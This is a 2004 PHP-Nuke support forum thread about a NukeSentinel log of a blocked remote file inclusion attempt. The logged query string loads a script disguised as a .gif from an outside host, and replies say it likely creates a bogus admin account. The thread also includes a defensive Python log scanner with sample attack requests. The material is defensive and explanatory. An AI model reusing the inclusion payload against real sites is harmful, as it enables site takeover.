Ravens PHP Scripts: Forums
 

 

Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
digibeet
Regular



Joined: Jul 08, 2004
Posts: 96
Location: Amsterdam, the Netherlands

Posted: Sun Jul 25, 2004 7:02 am

A.I. asked me to post this, so..

Datum & Tijd: 2004-07-25 06:49:24
Geblokkeerd IP: 200.184.48.252
Gebruikers ID: Anonymous (1)
Reden: Misbruik - ANDERS
--------------------
Gebruiks Agent: none
Query String: ************/modules.php?name=http://dcha0s.tripod.com.br/xpl.gif?
Doorgestuurd Voor: none
Client IP: none
Remote Adres: 200.184.48.252
Remote Poort: 3554
Aanvraag Methode: GET
--------------------
Who-Is voor IP
200.184.48.252




OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY

ReferralServer: [link hidden by forum]

NetRange: 200.0.0.0 - 200.255.255.255
CIDR: 200.0.0.0/8
NetName: LACNIC-200
NetHandle: NET-200-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
NameServer: NS2.DNS.BR
Comment: This IP address range is under LACNIC responsibility for further
Comment: allocations to users in LACNIC region.
Comment: Please see [link hidden by forum] for further details, or check the
Comment: WHOIS server located at whois.lacnic.net
RegDate: 2002-07-27
Updated: 2004-03-18

TechHandle: LACNIC-ARIN
TechName: LACNIC Hostmaster
TechPhone: (+55) 11 5509-3522
TechEmail: [link hidden by forum]

OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail: [link hidden by forum]

Ideas.. anybody?

Thanks,


Fred

_________________
"Grasp the subject, the words will follow."
Cato the Elder (234 BC - 149 BC)
Roman orator & politician. 
sixonetonoffun
Spouse Contemplates Divorce



Joined: Jan 02, 2003
Posts: 2496

Posted: Sun Jul 25, 2004 9:08 am

name=http:// is what it triggered on. The gif? is likely a script. I didn't check it out, but there are some floating around that mimic a remote linked image but actually try to create a bogus admin account.

_________________
openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR | GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30
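The trigger described in the post above, a `name=` value that begins with `http://`, can also be looked for in web-server access logs. This is an added example, not NukeSentinel's code or part of the original thread; the parameter list, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Parameters that select a file to include (assumed list; adjust per application).
INCLUDE_PARAMS = {"name", "file"}
# Value beginning with a URL scheme: http://, ftp://, php://, ...
REMOTE_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so single and double encoding are both caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_params(query_string):
    """Return include-style parameter names whose value is a remote URL."""
    hits = []
    for pair in re.split(r"[&;]", query_string):
        key, _, raw = pair.partition("=")
        key = fully_decode(key).split("[")[0].lower()
        if key in INCLUDE_PARAMS and REMOTE_VALUE.match(fully_decode(raw)):
            hits.append(key)
    return hits

def scan_log(lines):
    """Return (client_ip, flagged_params) for each request line that matches."""
    found = []
    for line in lines:
        m = REQUEST.search(line)
        if m and "?" in m.group(1):
            hits = remote_include_params(m.group(1).split("?", 1)[1])
            if hits:
                found.append((line.split()[0], hits))
    return found

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jul/2004:06:49:24 -0600] "GET /modules.php?name=http://files.example/x.gif? HTTP/1.0" 200 512',
    '192.0.2.11 - - [25/Jul/2004:06:50:01 -0600] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 9120',
    '192.0.2.12 - - [25/Jul/2004:06:51:13 -0600] "GET /modules.php?name=%2568ttp%3A%2F%2Ffiles.example%2Fx.gif HTTP/1.1" 200 512',
    '192.0.2.13 - - [25/Jul/2004:06:52:40 -0600] "GET /modules.php?name=Web_Links&url=http://www.example.org/ HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

The fourth sample line is not flagged because its URL sits in a parameter that is not used to choose an include file, which keeps ordinary outbound-link requests out of the results.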
BobMarion
Former Admin in Good Standing



Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)

Posted: Sun Jul 25, 2004 9:35 am

You will also notice that the IP is a Brazilian IP which is known for using this very same attack on many sites. I get this report many times a day from all over Brazil.

_________________
Bob Marion
Codito Ergo Sum
http://www.nukescripts.net 
digibeet







Posted: Sun Jul 25, 2004 10:29 am

Didn't know that, it was the first time for me

Thanks Bob,

Fred
 
All times are GMT - 6 Hours
 